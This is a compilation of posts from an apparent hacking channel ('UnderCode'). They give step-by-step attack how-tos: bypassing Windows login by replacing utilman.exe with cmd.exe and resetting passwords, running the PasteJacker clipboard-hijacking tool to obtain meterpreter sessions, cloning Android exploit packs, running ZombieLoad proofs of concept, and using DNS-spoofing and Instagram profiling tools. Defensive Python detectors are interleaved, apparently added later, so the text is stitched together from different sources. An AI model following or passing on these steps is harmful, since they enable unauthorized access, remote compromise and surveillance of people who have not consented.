UNDERCODE COMMUNITY
🦑 Undercode Cyber World!
@UndercodeCommunity


1️⃣ World's first platform which collects & analyzes every new hacking method.
+ AI Practice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
→ Undercode.help
- - - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - -

๐Ÿฆ‘Trick to crack the password If you forgot your Windows Password fastest way by UndercOde:
(t.me/UnderCodeTestingOfficial)

๐Ÿฆ‘๐Ÿ…ป๐Ÿ…ด๐Ÿ†ƒ ๐Ÿ†‚ ๐Ÿ†‚๐Ÿ†ƒ๐Ÿ…ฐ๏ธ๐Ÿ†๐Ÿ†ƒ:

1) get windows-10 bootlable DVD.

2) at bios settings Make sure your PC setup is configured to boot from DVD.

3) boot The Disk

4) Press SHIFT + F10 to open the Command prompt

5) Replace the utilman.exe with cmd.exe. (Utilman.exe is a built in Windows application that is designed to allow the user to configure Accessibility options such as the Magnifier, High Contrast Theme, Narrator and On Screen Keyboard before they log onto the system.)

> move d: \System32\utilman.exe d: \System32\utilman.exe.bak

7) Then copy :

copy d: \System32 \cmd.exe d: \System32 \ultiman.exe

8) Windows-10 is usually installed in Drive D:/ if you can not trace it by finding file using d:\windows\system32\utilman.exe, if canโ€™t trace this file in current drive then try in another Drive.

9) After successfully moving utilman.exe, remove your bootable DVD and reboot your problematic windows-10 installation from same CMD prompt.

> wpeutil reboot

10) On the Windows Login page,

> Click Utility Manager Icon at Bottom left.

11) As we have already replaced the Utility Manager EXE file with the Command Prompt EXE, it will open a CMD prompt. (Avoid error message)

12) Reset the Windows 10 password directly from the command prompt! It will not ask you for the old password and will set your new password directly.

> net user <username> <new_password>

13) Now, the password has been changed successfully

> Exit from command prompt, Get to the Login screen and apply your new password

Written by UnderCode
Tested on latest Win version
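
A defender-side check for the swap in steps 5 to 7, added here as an example and not part of the original post: it flags a System32 directory (live, or from a mounted offline image) where utilman.exe is byte-identical to cmd.exe or a utilman.exe.bak was left behind. The function names, finding labels and stand-in file contents are assumptions made for the example.

```python
import hashlib
import tempfile
from pathlib import Path


def sha256_of(path):
    """Hash a file in chunks so large binaries are not read into memory at once."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def audit_utilman(system32):
    """Return a list of findings for one System32 directory."""
    # Match names case-insensitively: an offline image may be mounted on a
    # case-sensitive filesystem where the file is called "Utilman.exe".
    files = {p.name.lower(): p for p in Path(system32).iterdir() if p.is_file()}
    findings = []
    utilman, cmd = files.get("utilman.exe"), files.get("cmd.exe")
    if utilman is None:
        findings.append("utilman-missing")
    elif cmd is not None and sha256_of(utilman) == sha256_of(cmd):
        # The accessibility button on the logon screen now starts a shell.
        findings.append("utilman-is-cmd")
    if "utilman.exe.bak" in files:
        # The original binary was moved aside, as in step 5 above.
        findings.append("utilman-backup-left-behind")
    return findings


def constructed_system32(swapped):
    """Build a throwaway directory with stand-in file contents (constructed data)."""
    root = Path(tempfile.mkdtemp())
    (root / "cmd.exe").write_bytes(b"stand-in for cmd.exe")
    if swapped:
        (root / "Utilman.exe.bak").write_bytes(b"stand-in for the real utilman.exe")
        (root / "Utilman.exe").write_bytes(b"stand-in for cmd.exe")
    else:
        (root / "Utilman.exe").write_bytes(b"stand-in for the real utilman.exe")
    return root


if __name__ == "__main__":
    for label, swapped in (("clean", False), ("swapped", True)):
        print(label, audit_utilman(constructed_system32(swapped)))
```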
- - - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - -
- - - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - -

๐Ÿฆ‘ A gd collection of android Exploits and Hacks
(instagram.com/UnderCodeTestingCompany)

๐Ÿฆ‘Installisation & Run:

1) git clone https://github.com/sundaysec/Android-Exploits.git

> We recommend you grab the latest version of exploitpack

2) wget https://github.com/juansacco/exploitpack/archive/master.zip

3) Extract then Navigate into the folder and type:

> java -jar ExploitPack.jar

4) Load the exploits

Learn and hack

🦑OWASP Top 10 Mobile Risks:

1) Insecure Data Storage

2) Weak Server Side Controls

3) Insufficient Transport Layer Protection

4) Client Side Injection

5) Poor Authorization and Authentication

6) Improper Session Handling

7) Security Decisions Via Untrusted Inputs

8) Side Channel Data Leakage

9) Broken Cryptography

10) Sensitive Information Disclosure

Written by UnderCode
- - - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - -
- - - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - -

๐Ÿฆ‘Different Types of Ransomware:
(t.me/UnderCodeTestingOfficial)

๐Ÿฆ‘CryptoLocker

CyptoLocker botnet is one of the oldest forms of cyber attacks which has been around for the past two decades. The CyptoLocker ransomware came into existence in 2013 when hackers used the original CryptoLocker botnet approach in ransomware.

CyptoLocker ransomware is the most destructive form of ransomware since it uses strong encryption algorithms. It is often impossible to decrypt (restore) the Crypto ransomware-infected computer and files without paying the ransom.

🦑WannaCry

WannaCry is the most widely known ransomware variant across the globe. The WannaCry ransomware has infected nearly 125,000 organizations in over 150 countries. Some of the alternative names given to the WannaCry ransomware are WCry or WanaCrypt0r.

🦑Bad Rabbit

Bad Rabbit is another strain of ransomware which has infected organizations across Russia and Eastern Europe. It usually spreads through a fake Adobe Flash update on compromised websites.

🦑Cerber

Cerber is another ransomware variant which targets cloud-based Office 365 users. Millions of Office 365 users have fallen prey to an elaborate phishing campaign carried out by the Cerber ransomware.

🦑Crysis

Crysis is a special type of ransomware which encrypts files on fixed drives, removable drives, and network drives. It spreads through malicious email attachments with double-file extension. It uses strong encryption algorithms making it difficult to decrypt within a fair amount of time.

🦑CryptoWall

CryptoWall is an advanced form of CryptoLocker ransomware. It came into existence in early 2014 after the downfall of the original CryptoLocker variant. Today, there are multiple variants of CryptoWall in existence, including CryptoDefense, CryptoBit, CryptoWall 2.0, and CryptoWall 3.0.

🦑GoldenEye

GoldenEye is similar to the infamous Petya ransomware. It spreads through a massive social engineering campaign that targets human resources departments. When a user downloads a GoldenEye-infected file, it silently launches a macro which encrypts files on the victim's computer.

🦑Jigsaw

Jigsaw is one of the most destructive types of ransomware: it encrypts files and progressively deletes the encrypted files until a ransom is paid. It starts deleting the files one after the other on an hourly basis until the 72-hour mark, when all the remaining files are deleted.

🦑Locky

Locky is another ransomware variant which is designed to lock the victim's computer and prevent them from using it until a ransom is paid. It usually spreads through a seemingly benign email message disguised as an invoice.

When a user opens the email attachment, the invoice gets deleted automatically, and the victim is directed to enable macros to read the document. When the victim enables macros, Locky begins encrypting multiple file types using AES encryption.

> Petya, NotPetya, TeslaCrypt, TorrentLocker, ZCryptor, etc., are some of the other ransomware variants that are well-known for their malicious activities.

Written by UnderCode
- - - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - -
- - - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - -

๐Ÿฆ‘How Hack Systems (wINDOWS) with the automation of PasteJacking attacks? WORK TERMUX /KALI/PARROT/DEBIAN...
(instagram.com/UnderCodeTestingCompany)


๐Ÿฆ‘๐Ÿ…ป๐Ÿ…ด๐Ÿ†ƒ ๐Ÿ†‚ ๐Ÿ†‚๐Ÿ†ƒ๐Ÿ…ฐ๏ธ๐Ÿ†๐Ÿ†ƒ:

> Pastejacking is a method that malicious websites employ to take control of your computersโ€™ clipboard and change its content to something harmful without your knowledge

> So here what I did is automating the original attack and adding two other tricks to fool the user, using HTML and CSS Will talk about it then added meterpreter sessions as I said before.

๐Ÿฆ‘How it WORKS:

1) The target opens an HTML page served by the tool and this page has anything that makes the user wants to copy from it and paste into the terminal. Ex: package installation instructions

2) Target copies anything from the page then in the background it gets replaced quickly with our liner.

3) The user pastes into the terminal and before he notices that the line he copied has been changed :

> The line gets executed by itself in the background (Without pressing enter)

> The terminal gets cleared.

> The user sees the terminal is usable again.

> You already got your meterpreter session by this time.

4) All of that happened in less than a second, and maybe the user thinks this is a bad program and he won't install it.

🦑INSTALLATION & RUN:

1) git clone https://github.com/D4Vinci/PasteJacker.git

2) sudo python3 -m pip install ./PasteJacker

3) sudo pastejacker

🦑Requirements:

1) Python 3 and setuptools module.

2) Linux or Unix-based system (Currently tested only on Kali Linux rolling and Ubuntu 16.04).

3) Third-party requirements like msfvenom but only if you are gonna use the msfvenom option, of course.

4) Third-party library ncurses-dev for Ubuntu

5) Root access.

Written by UnderCode
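
A check that a terminal wrapper or clipboard manager could run before pasted text reaches the shell, added here as an example and not taken from PasteJacker: it flags the three behaviours listed under "How it WORKS" (running without Enter, clearing the screen, carrying extra commands). The function names, finding labels and sample strings are constructed for the example.

```python
import re

# Control bytes other than tab, LF and CR (line breaks are reported separately).
CONTROL_CHARS = re.compile(r"[\x00-\x08\x0b\x0c\x0e-\x1f\x7f]")
# Commands or ANSI sequences that wipe the screen and hide what just ran.
SCREEN_WIPE = re.compile(
    r"(?:^|[;&|\n]\s*)(?:clear|reset|cls)\b|\x1b\[[0-9;]*[HJ]|\x1bc"
)
# Shell operators that attach a further command to the one the user meant to copy.
CHAINING = re.compile(r"&&|\|\||;|\||`|\$\(")


def inspect_paste(text):
    """Return finding labels for clipboard text that is about to be pasted."""
    findings = []
    if "\n" in text or "\r" in text:
        # An embedded line break makes the shell execute without the user pressing Enter.
        findings.append("line-break")
    if SCREEN_WIPE.search(text):
        findings.append("screen-wipe")
    if CONTROL_CHARS.search(text):
        findings.append("control-char")
    if CHAINING.search(text):
        # Conservative: legitimate pipelines are flagged too, so review rather than block.
        findings.append("chaining")
    return findings


def safe_to_paste(text):
    """True only when nothing in the text needs a second look."""
    return not inspect_paste(text)


# Constructed samples. The second mimics the shape described above with a harmless command.
SAMPLES = {
    "what the page displayed": "sudo apt install htop",
    "what landed in the clipboard": "echo constructed-placeholder; clear\n",
    "escape-sequence variant": "ls\x1b[2J",
}

if __name__ == "__main__":
    for label, text in SAMPLES.items():
        print(f"{label!r}: {inspect_paste(text) or 'clean'}")
```

Shells with bracketed paste enabled (readline's `enable-bracketed-paste`) hold pasted line breaks until the user presses Enter, which removes the first finding at the source.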
- - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - -
- - - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - -

๐Ÿฆ‘2019 HACKING AWESOME TOOL

> This repository contains four different proof-of-concept attacks showing ZombieLoad. It also includes four different victim applications to test the leakage in various scenarios.

> All demos are tested with an Intel Core i7-8650U, but they should work on any Linux system with any modern Intel Core or Xeon CPU since 2010. We provide three variants for Linux, which we tested on Ubuntu 18.04.1 LTS, and two variants for Windows, which we tested on Windows 10 (1803 build 17134.706).

> For best results, we recommend a fast CPU that supports Intel TSX (e.g. nearly any Intel Core i7-5xxx, i7-6xxx, or i7-7xxx).
(t.me/UnderCodeTestingOfficial)

🦑INSTALLATION & RUN:

1) git clone https://github.com/IAIK/ZombieLoad

2) cd ZombieLoad

3) sudo modprobe msr

4) cd module && make load

5) Then, run the attacker on one hyperthread as root:

> sudo taskset -c 3 ./leak

🦑MORE USAGES:

🦑Userspace Victim (Linux and Windows)

1) An unprivileged user application which constantly loads the same value from its memory.

> Run (Linux)

Simply run the victim on the same physical core but a different hyperthread as the attacker:

> taskset -c 7 ./secret

2) You can also provide a secret letter to the victim application as a parameter, e.g., taskset -c 7 ./secret B to access memory containing 'B's. The default secret letter is 'X'.

3) As soon as the victim is started, there should be a clear signal in the attacker process, i.e., the bar for the leaked letter should get longer.

🦑Run (Windows)

1) Simply run the victim on the same physical core but a different hyperthread as the attacker:

> start /affinity 7 .\secret.exe

You can also provide a secret letter to the victim application as a parameter, e.g.,

> start /affinity 7 .\secret.exe B

to access memory containing 'B's.

2) The default secret letter is 'X'.

3) As soon as the victim is started, there should be a clear signal in the attacker process, i.e., the bar for the leaked letter should get longer.

🦑Kernel Victim (Linux only)

4) A kernel module which constantly loads the letter 'J'.

> Run

5) Before running the victim, the kernel module has to be loaded into the kernel. This is done by running sudo insmod leaky.ko. Then, simply run the victim on the same physical core but a different hyperthread as the attacker: taskset -c 7 ./secret

6) As soon as the victim is started, there should be a clear signal in the attacker process, i.e., the bar for the letter 'J' should get longer.

🦑Intel SGX Victim (Linux only)

7) An Intel SGX enclave which constantly loads the letter 'S'. This victim requires that the SGX driver and SDK are installed.

> Run

8) Simply run the victim on the same physical core but a different hyperthread as the attacker: taskset -c 7 ./secret

9) As soon as the victim is started, there should be a clear signal in the attacker process, i.e., the bar for the letter 'S' should get longer.

🦑VM Victim (Linux and Windows)

10) A virtual machine containing an application which constantly loads the same value from its memory. This victim requires that QEMU is installed, and VT-x is enabled.

Written by UnderCode
- - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - -
- - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - -

๐Ÿฆ‘Some commun attacks for Servers
(instagram.com/UnderCodeTestingCompany)

๐Ÿฆ‘๐Ÿ…ป๐Ÿ…ด๐Ÿ†ƒ ๐Ÿ†‚ ๐Ÿ†‚๐Ÿ†ƒ๐Ÿ…ฐ๏ธ๐Ÿ†๐Ÿ†ƒ:

1> The DROWN (Decrypting RSA with Obsolete and Weakened eNcryption) attack is a cross-protocol security bug that attacks servers supporting modern SSLv3/TLS protocol suites by using their support for the obsolete,

2> insecure, SSL v2 protocol to leverage an attack on connections using up-to-date protocols that would otherwise be secure.


3> DROWN can affect all types of servers that offer services encrypted with SSLv3/TLS yet still support SSLv2, provided they share the same public key credentials between the two protocols.[3]

4> Additionally, if the same public key certificate is used on a different server that supports SSLv2, the TLS server is also vulnerable due to the SSLv2 server leaking key information that can be used against the TLS server

5> Full details of DROWN were announced in March 2016, along with a patch that disables SSLv2 in OpenSSL; the vulnerability was assigned the ID CVE-2016-0800.[4] The patch alone will not be sufficient to mitigate the attack if the certificate can be found on another SSLv2 host. The only viable countermeasure is to disable SSLv2 on all servers.

6> The researchers estimated that 33% of all HTTPS sites were affected by this vulnerability as of March 1, 2016

🦑Protections against this attack:

1) To protect against DROWN, server operators need to ensure that their private keys are not used anywhere with server software that allows SSLv2 connections. This includes web servers, SMTP servers, IMAP and POP servers, and any other software that supports SSL/TLS.[8]

2) The OpenSSL group has released a security advisory, and a set of patches intended to mitigate the vulnerability by removing support for obsolete protocols and ciphers.[9] However, if the server's certificate is used on other servers that support SSLv2, it is still vulnerable, and so are the patched servers.

3) Numerous sources have recommended that the vulnerability be patched as soon as possible by site operators.


Written by UnderCode
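
The key-sharing condition described above, worked through as an added example that is not part of the original post: an audit over a service inventory that marks a TLS-only endpoint as exposed when its key is also served by any endpoint that still accepts SSLv2. The inventory, host names and `key-A`-style fingerprints are constructed, and the function names are assumptions.

```python
from collections import defaultdict

# Constructed inventory: (endpoint, key fingerprint, protocols the endpoint accepts).
# "key-A" etc. stand in for a hash of the public key in the endpoint's certificate.
INVENTORY = [
    ("www.example.test:443", "key-A", {"TLSv1.2"}),
    ("mail.example.test:25", "key-A", {"SSLv2", "TLSv1.0"}),
    ("imap.example.test:993", "key-B", {"TLSv1.2"}),
    ("legacy.example.test:443", "key-C", {"SSLv2", "SSLv3"}),
]


def drown_audit(inventory):
    """Map every endpoint to 'ok' or to the reason its key is exposed via SSLv2."""
    by_key = defaultdict(list)
    for endpoint, key_id, protocols in inventory:
        by_key[key_id].append((endpoint, protocols))

    report = {}
    for members in by_key.values():
        sslv2_peers = sorted(ep for ep, protos in members if "SSLv2" in protos)
        for endpoint, protos in members:
            if "SSLv2" in protos:
                report[endpoint] = "exposed: accepts SSLv2 itself"
            elif sslv2_peers:
                # Patched or TLS-only, yet the same key is reachable over SSLv2 elsewhere.
                report[endpoint] = (
                    "exposed: key also served over SSLv2 by " + ", ".join(sslv2_peers)
                )
            else:
                report[endpoint] = "ok"
    return report


def sslv2_to_disable(inventory):
    """Endpoints where SSLv2 has to be turned off."""
    return sorted(ep for ep, _key, protos in inventory if "SSLv2" in protos)


def disable_sslv2(inventory, endpoints):
    """Return a copy of the inventory with SSLv2 removed on the named endpoints."""
    return [
        (ep, key, protos - {"SSLv2"} if ep in endpoints else protos)
        for ep, key, protos in inventory
    ]


if __name__ == "__main__":
    for endpoint, status in sorted(drown_audit(INVENTORY).items()):
        print(f"{endpoint:26} {status}")
    # Fixing only the legacy web host leaves the main site exposed through the mail server.
    partial = disable_sslv2(INVENTORY, {"legacy.example.test:443"})
    print("after partial fix:", drown_audit(partial)["www.example.test:443"])
```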
- - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - -
- - - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - -

๐Ÿฆ‘A gd hacking tool for kali/termux The OneSiTyOne
Fast SNMP Scanner
(instagram.com/UnderCodeTestingCompany)

๐Ÿฆ‘๐Ÿ…ป๐Ÿ…ด๐Ÿ†ƒ ๐Ÿ†‚ ๐Ÿ†‚๐Ÿ†ƒ๐Ÿ…ฐ๏ธ๐Ÿ†๐Ÿ†ƒ:

The SNMP protocol is a stateless, datagram oriented protocol. An SNMP scanner is a program that sends SNMP requests to multiple IP addresses, trying different community strings and waiting for a reply. Unfortunately SNMP servers don't respond to requests with invalid community strings and the underlying UDP protocol does not reliably report closed UDP ports. This means that 'no response' from the probed IP address can mean either of the following:

1) machine unreachable

2) SNMP server not running

3) invalid community string

4) the response datagram has not yet arrived

🦑INSTALLATION & RUN:

1) git clone https://github.com/trailofbits/onesixtyone

2) cd onesixtyone

3) Linux, FreeBSD, OpenBSD:

> gcc -o onesixtyone onesixtyone.c

🦑Solaris:

> gcc -o onesixtyone onesixtyone.c -lsocket -lnsl

Installation is not necessary, just run the program from the current directory.
If you wish you may copy it to /usr/local/bin

🦑MORE :

> The approach taken by most SNMP scanners is to send the request, wait for n seconds and assume that the community string is invalid. If only 1 of every hundred scanned IP addresses responds to the SNMP request, the scanner will spend 99*n seconds waiting for replies that will never come. This makes traditional SNMP scanners very inefficient.

> onesixtyone takes a different approach to SNMP scanning. It takes advantage of the fact that SNMP is a connectionless protocol and sends all SNMP requests as fast as it can. Then the scanner waits for responses to come back and logs them, in a fashion similar to Nmap ping sweeps. By default onesixtyone waits for 10 milliseconds between sending packets, which is adequate for 100MBs switched networks. The user can adjust this value via the -w command line option. If set to 0, the scanner will send packets as fast as the kernel would accept them, which may lead to packet drop.

> Running onesixtyone on a class B network (switched 100MBs with 1Gbs backbone) with -w 10 gives us a performance of 3 seconds per class C, with no dropped packets. All 65536 IP addresses were scanned in less than 13 minutes. onesixtyone sends a request for the system.sysDescr.0 value, which is present on almost all SNMP enabled devices. This returned value gives us a description of the system software running on the device

Written by UnderCode
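
Because a scanner of this kind sends its requests back to back (10 ms apart by default, about 3 seconds per class C in the figures above), it appears in flow logs as one source reaching many UDP/161 destinations inside a short window. The detector below is an added example, not part of onesixtyone or the original post; the log format, addresses, thresholds and function names are constructed for the illustration.

```python
from collections import defaultdict, deque


def constructed_log():
    """Constructed flow records in the form 'epoch_seconds src dst proto dport'."""
    lines = []
    # A sweep paced like the default above: one request every 10 ms across a /24.
    for i in range(1, 255):
        lines.append(f"{1000.0 + i * 0.010:.3f} 10.0.0.5 192.168.1.{i} udp 161")
    # A monitoring station polling the same three devices once a minute.
    for minute in range(3):
        for host in (10, 11, 12):
            lines.append(f"{1000.0 + minute * 60:.3f} 10.0.0.9 192.168.1.{host} udp 161")
    # Unrelated DNS traffic that must not be counted.
    for i in range(1, 100):
        lines.append(f"{1000.0 + i * 0.010:.3f} 10.0.0.7 192.168.1.{i} udp 53")
    return sorted(lines, key=lambda line: float(line.split()[0]))


def find_snmp_sweeps(lines, window=5.0, min_targets=50):
    """Return {source: peak distinct UDP/161 targets within `window` seconds}
    for every source whose peak reaches `min_targets`."""
    recent = defaultdict(deque)   # source -> (timestamp, destination) pairs in the window
    peak = {}                     # source -> largest distinct-target count seen so far
    for line in lines:
        parts = line.split()
        if len(parts) != 5:
            continue              # skip malformed records
        ts_text, src, dst, proto, dport = parts
        if proto != "udp" or dport != "161":
            continue
        try:
            ts = float(ts_text)
        except ValueError:
            continue
        queue = recent[src]
        queue.append((ts, dst))
        # Drop requests that have aged out of the sliding window.
        while queue and ts - queue[0][0] > window:
            queue.popleft()
        distinct = len({target for _, target in queue})
        peak[src] = max(peak.get(src, 0), distinct)
    return {src: count for src, count in peak.items() if count >= min_targets}


if __name__ == "__main__":
    print(find_snmp_sweeps(constructed_log()))
```

The monitoring station stays below the threshold because it repeats the same few targets; tune `window` and `min_targets` to the largest legitimate poller on the network.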
-- - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - -
- - - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - -

๐Ÿฆ‘2019 tested by UnderCode Information Gathering Tool For Instagram.
like Username, Profile Name, URL, Followers, Following, Number of Posts, Bio, Profile Picture URL, Is Business Account ?, Connected to a FB account ?, External URL, Joined Recently ?, Business Category Name, Is private ?, Is Verified ?, Downloads Public Photos
> Check Our at instagram.com/UnderCodeTestingCompany

๐Ÿฆ‘INSTALLISATION & RUN:

( TERMUX OR ANY LINUX DISTRO)

1) pkg install -y git python

2) git clone https://github.com/th3unkn0n/osi.ig.git

3) cd osi.ig

4) chmod +x install.sh && ./install.sh

5) python3 main.py


THATS ALL

Written by UnderCode
- - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - -
- - - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - -

๐Ÿฆ‘ PreInstalled kali tool DNSChef Package Description
(instagram.com/UnderCodeTestingCompany)

WHAT IS DNS CHEF ?

> DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts.

> A DNS proxy (aka โ€œFake DNSโ€) is a tool used for application network traffic analysis among other uses. For example, a DNS proxy can be used to fake requests for โ€œbadguy.comโ€ to point to a local machine for termination or interception instead of a real host somewhere on the Internet.

> Most will simply point all DNS queries a single IP address or implement only rudimentary filtering. DNSChef was developed as part of a penetration test where there was a need for a more configurable system.

> As a result, DNSChef is cross-platform application capable of forging responses based on inclusive and exclusive domain lists, supporting multiple DNS record types, matching domains with wildcards, proxying true responses for nonmatching domains, defining external configuration files, IPv6 and many other features. You can find detailed explanation of each of the features and suggested uses below.

> The use of DNS Proxy is recommended in situations where it is not possible to force an application to use some other proxy server directly. For example, some mobile applications completely ignore OS HTTP Proxy settings. In these cases, the use of a DNS proxy server such as DNSChef will allow you to trick that application into forwarding connections to the desired destination.

oFFICIAL Source: http://thesprawl.org/projects/dnschef/

๐Ÿฆ‘How to Use?

> root@kali:~# dnschef -h


> dnschef.py [options]:
_
Written by UnderCode
- - - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - -
- - - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - -

๐Ÿฆ‘What is exactly definition for dns?
(t.me/UnderCodeTestingOfficial)

๐Ÿฆ‘DNS

1) The Domain Name System (DNS) is the phonebook of the Internet. Humans access information online through domain names, like nytimes.com or espn.com. Web browsers interact through Internet Protocol (IP) addresses. DNS translates domain names to IP addresses so browsers can load Internet resources.

2) Each device connected to the Internet has a unique IP address which other machines use to find the device.

3) DNS servers eliminate the need for humans to memorize IP addresses such as 192.168.1.1 (in IPv4), or more complex newer alphanumeric IP addresses such as 2400:cb00:2048:1::c629:d7a2 (in IPv6).

🦑How does DNS work?

1) The process of DNS resolution involves converting a hostname (such as www.example.com) into a computer-friendly IP address (such as 192.168.1.1).

2) An IP address is given to each device on the Internet, and that address is necessary to find the appropriate Internet device - like a street address is used to find a particular home. When a user wants to load a webpage, a translation must occur between what a user types into their web browser (example.com) and the machine-friendly address necessary to locate the example.com webpage.

3) In order to understand the process behind the DNS resolution, it’s important to learn about the different hardware components a DNS query must pass between. For the web browser, the DNS lookup occurs “behind the scenes” and requires no interaction from the user’s computer apart from the initial request.

@ Mr BotNet(tm)
- - - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - -
- - - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - -

๐Ÿฆ‘All dns Servers Types:
t.me/UnderCodeTestingOfficial)

๐Ÿฆ‘There are 4 DNS servers involved in loading a webpage:


1) DNS recursor -

> The recursor can be thought of as a librarian who is asked to go find a particular book somewhere in a library. The DNS recursor is a server designed to receive queries from client machines through applications such as web browsers. Typically the recursor is then responsible for making additional requests in order to satisfy the clientโ€™s DNS query.


2) Root nameserver -

> The root server is the first step in translating (resolving) human readable host names into IP addresses. It can be thought of like an index in a library that points to different racks of books - typically it serves as a reference to other more specific locations.


3) TLD nameserver -

> The top level domain server (TLD) can be thought of as a specific rack of books in a library. This nameserver is the next step in the search for a specific IP address, and it hosts the last portion of a hostname (in example.com, the TLD server is “com”).

4) Authoritative nameserver -

> This final nameserver can be thought of as a dictionary on a rack of books, in which a specific name can be translated into its definition. The authoritative nameserver is the last stop in the nameserver query. If the authoritative name server has access to the requested record, it will return the IP address for the requested hostname back to the DNS Recursor (the librarian) that made the initial request.

🦑What's the difference between an authoritative DNS server and a recursive DNS resolver?

1) Both concepts refer to servers (groups of servers) that are integral to the DNS infrastructure, but each performs a different role and lives in different locations inside the pipeline of a DNS query. One way to think about the difference is the recursive resolver is at the beginning of the DNS query and the authoritative nameserver is at the end.

Recursive DNS resolver

2) The recursive resolver is the computer that responds to a recursive request from a client and takes the time to track down the DNS record. It does this by making a series of requests until it reaches the authoritative DNS nameserver for the requested record (or times out or returns an error if no record is found).

3) Luckily, recursive DNS resolvers do not always need to make multiple requests in order to track down the records needed to respond to a client; caching is a data persistence process that helps short-circuit the necessary requests by serving the requested resource record earlier in the DNS lookup

@ Mr BotNet(tm)
- - - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - -
- - - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - -

๐Ÿฆ‘
DNS Spoofing tool made in Python 3 with Scapyโ˜ ๏ธkali/Termux
(t.me/UnderCodeTestingOfficial)

๐Ÿฆ‘INSTALLISATION & RUN:

1) git clone https://github.com/Trackbool/DerpNSpoof'


2) install the requirements with:

> 'pip3 install -r requirements.txt' (recomended) or manually 'pip3 install scapy'

> Scapy uses tcpdump

3) To execute the tool, you will need root permissions


4) Options to use:
<ip> - Spoof the DNS query packets of a certain IP address
<all> - Spoof the DNS query packets of all hosts
[!] Examples:
# python3 DerpNSpoof.py 192.168.1.20 myfile.txt
# python3 DerpNSpoof.py all myfile.txt

@ Mr BotNet(tm)
- - - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - -
- - - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - -

๐Ÿฆ‘ Kali Linux Burp Suite Tutorial :
(instagram.com/UnderCodeTestingCompany)

๐Ÿฆ‘๐Ÿ…ป๐Ÿ…ด๐Ÿ†ƒ ๐Ÿ†‚ ๐Ÿ†‚๐Ÿ†ƒ๐Ÿ…ฐ๏ธ๐Ÿ†๐Ÿ†ƒ:

> Burpsuite is a collection of tools bundled into a single suite made for Web Application Security or Penetration testing. Itโ€™s a java executable and hence itโ€™s cross-platform. Kali Linux comes with Buprsuite free edition installed. There is also a professional version available.

🦑Features include:


1) Application-Aware Spider: Used for spidering/crawling a given scope of pages.

2) Scanner: Automatically scans for vulnerabilities just like any other automated scanner.

3) Intruder: Used to perform attacks & brute-forces on pages in a highly customizable manner.

4) Repeater: Used for manipulating and resending individual requests.

5) Sequencer: Used mainly for testing/fuzzing session tokens.

6) Extensibility, allowing you to easily write your own plugins, to perform complex and highly customized tasks within Burp.

7) Comparer & Decoder used for misc purposes that might come along the way when you conduct a Web Security test


🦑How to hack with it?

> Spidering a website

Spidering is a major part of recon while performing web security tests. It helps the pentester to identify the scope & architecture of the web application. As described earlier, Burpsuite has its own spider, called the Burp spider, which can crawl a website.

1) Set up the proxy

First, start Burpsuite and check the details under the Proxy tab in the Options sub-tab. Ensure the IP is the localhost IP & the port is 8080.

> On IceWeasel/Firefox, go to Options > Preferences > Network > Connection Settings.

> Choose Manual Proxy Configuration

2) Getting Content into Burpsuite

> After you have set up the proxy, go to the target normally by entering the URL in the address bar. You will notice that the page does not load.

> This is because burpsuite is intercepting the connection.

3) Scope Selection & Starting Spider

> Now narrow down the target as you want. Here the target/mutillidae is selected. Right-click mutillidae in the sitemap & select the Spider from Here option.

4) Manipulating Details

Now you can see, as the spider runs on your screen, that the tree inside the mutillidae branch gets populated. Also, the requests made are shown in the queue and the details are shown in the Request tab.

5) Move on to different Tabs and see all the underlying information.

6) Finally, check if the spider is finished by viewing the Spider tab.

@ Mr BotNet(tm)
- - - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - -
- - - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - -

๐Ÿฆ‘ How to hack a website using Termux
(t.me/UnderCodeTestingOfficial)

๐Ÿฆ‘INSTALLISATION & RUN:

Hackerpro - All in One Hacking Tool for Linux & Android (Termux)

